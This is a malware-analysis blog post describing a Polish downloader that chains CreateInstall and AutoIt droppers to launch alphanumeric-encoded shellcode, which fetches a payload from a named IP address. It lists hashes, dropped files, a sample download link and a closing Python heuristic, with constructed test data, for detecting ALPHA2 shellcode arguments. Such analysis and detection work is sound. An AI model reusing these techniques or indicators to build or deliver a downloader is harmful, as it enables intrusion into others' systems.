This will be a quick analysis of a Downloader I recently came across (thanks to Artem for providing the sample!). What makes this malware special is the uncommon programming language it uses to accomplish its tasks (actually a scripting language). The malware itself is very rudimentary; only the actual Downloader (which spawns a shellcode) is a bit more advanced. Unfortunately the server isn't responding to the requests from the Downloader, so it is unclear what the final purpose of this malware is. I think the scripting languages and the shellcode were chosen to evade AV (heuristic) detections. The detection rates of the Dropper are still very low (6/46), even 2 years after its creation. I haven't uploaded the dropped files, but I guess their detection rates are also very low, if there are any at all. This task is left to the reader. ;-)

- Makes use of the Gentee scripting language (actually uses CreateInstall, which was coded in Gentee)
- Makes use of the AutoIt scripting language
- Spawns a shellcode to download additional component(s)

A dynamic analysis of this malware can be found at malwr.com.

I'll try to give some additional information, so let's start with the Dropper. All files of this malware have the extension ".com", but they are all .exe files (just renamed to .com).

Dropper

Sample: sample.exe
Size: 785.742 Bytes
Timestamp: 31.01.2011 17:44:13
MD5: DBABCE375DE619916E727D24679C6BD3
SHA1: D8C7EF587EAB81C1BBC79AA695F5F7FF319F0484

The sample can be downloaded at kernelmode.info: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2445

The Dropper was created with the CreateInstall tool ( www.createinstall.com ) and consists of multiple files. CreateInstall itself is written in the Gentee programming language, which is actually a scripting language. Gentee programs can be bundled into standalone .exe files and are interpreted at runtime by the Gentee interpreter (genteert.dll and guig.dll).

The Dropper creates the following files and folders in the Windows Temp folder:
- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp (XX stands for random hex bytes)
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\aqq1.com
- ...Temp\Symantec\faktura_scan535624.jpg
- ...Temp\Symantec\inct.com

Thereafter the file inct.com is executed and the following files are deleted again:
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll

inct.com

This file is a compiled AutoIt script, which by default is packed with UPX. After unpacking it, we can load the executable into an AutoIt decompiler (e.g. www.exe2aut.com ) to see that this file just shows the picture "faktura_scan535624.jpg" (see above) and runs the file "aqq1.com" (see above). The picture shows a Polish bill of sale for a product from the website fakturki.pl.

aqq1.com

This file was (also) created with CreateInstall and drops the following files and folders into the Windows Temp and Autostart folders:
- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\jqs.com
- ...\Autostart\Symantec.com

Then it runs the file "Symantec.com" and deletes the following files and folders:
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX\
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll

Symantec.com

This is another AutoIt script compiled into a standalone .exe file. It starts the dropped file "jqs.com" with one of two parameters (alphanumeric shellcodes, encoded with alpha2 - see http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2 ).

[Figure 3: Symantec.com sourcecode]

The script first checks whether the number of days passed in the current year has reached 100. If so, jqs.com is started with the first shellcode and Symantec.com then sleeps for a minute. Then a file named "jar_cache879799398409779005999.tmp" is searched for in the Temp folder and deleted if found. I don't know why this "Java file" is searched for and deleted, but it is probably the file that gets downloaded, or that is dropped by the downloaded file. Another possibility is that the malware is launched by a Java applet or a Java exploit. If this Java file isn't found, jqs.com is started with the second shellcode. Then the script again sleeps for a minute, searches for the same "Java file" and deletes it.

There are two Polish words used as function names in the script (meaning "launch" and "cleanup"). Together with the picture (see above), I think the malware's creator is from Poland or Polish-speaking.

jqs.com

This file was also packed with UPX. It launches one of the above shellcodes within a new thread to connect to the server at 184.82.19.103. It does this by allocating a memory buffer (VirtualAlloc()) and storing the passed parameter (the shellcode) in it. Then the pointer to the buffer is passed as lpParameter to the CreateThread() API function. The new thread uses the pointer to call the shellcode (call eax).

[Figure 2: Call to shellcode]
[Figure 3: Alphanumeric encoded shellcode]

The shellcode dynamically resolves some Windows API functions to call them afterwards. It requests data from the server (InternetReadFile()), copies it into a buffer (VirtualAlloc()) and passes execution to it. As mentioned at the beginning, the server isn't responding, so it's not possible to get more information about the downloaded data (another file or shellcode).

Now I need a Re-Neducation :-)
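As an added example (not code from the original post), here is a small Python detection heuristic for the behaviour described above: a child process (jqs.com in this case) launched with a long, purely alphanumeric argument that carries an ALPHA2 decoder stub. The log format, the decoder-stub string and the sample log lines are assumptions constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Decoder stub that ALPHA2 (mixedcase, ECX as base register) prepends to the encoded
# payload. Assumption for this example: confirm it against the encoder's own output.
ALPHA2_MIXED_DECODER = "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
ALNUM = re.compile(r"^[A-Za-z0-9]+$")
MIN_LEN = 120  # stub plus any real payload is far longer than typical arguments

def argument_looks_like_alpha2(arg: str) -> Optional[str]:
    """Return a reason string if a single argument looks like ALPHA2 shellcode."""
    if len(arg) < MIN_LEN or not ALNUM.match(arg):
        return None
    if ALPHA2_MIXED_DECODER in arg:
        return "ALPHA2 mixedcase decoder stub present"
    # Fallback: hex hashes and similar tokens rarely mix upper case and digits as
    # densely as encoded shellcode does, so flag a dense mix even without a known stub.
    upper = sum(c.isupper() for c in arg) / len(arg)
    digit = sum(c.isdigit() for c in arg) / len(arg)
    if upper > 0.3 and digit > 0.1:
        return "long alphanumeric argument with shellcode-like character mix"
    return None

# Constructed log format: parent -> child "command line"
LINE = re.compile(r'^(?P<parent>\S+) -> (?P<child>\S+) "(?P<args>.*)"$')

def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Flag process-creation lines whose command line carries a suspicious argument."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        for arg in m["args"].split():
            reason = argument_looks_like_alpha2(arg)
            if reason:
                findings.append((m["parent"], m["child"], reason))
                break
    return findings

# Constructed sample: getPC prefix, decoder stub, then filler standing in for the payload.
FAKE_SHELLCODE = "PYIIIIIIIIIIIIIIII7QZ" + ALPHA2_MIXED_DECODER + "Kl9Ju4" * 40
SAMPLE_LOG = [
    r'explorer.exe -> inct.com ""',
    r'inct.com -> aqq1.com ""',
    r'Symantec.com -> jqs.com "' + FAKE_SHELLCODE + '"',
    r'powershell.exe -> python.exe "verify.py --sha512 ' + "0123456789abcdef" * 8 + '"',
]
```

Running `scan(SAMPLE_LOG)` flags only the jqs.com launch; the 128-character hex hash on the last line is long and alphanumeric but has no decoder stub and no upper-case/digit mix, so it passes.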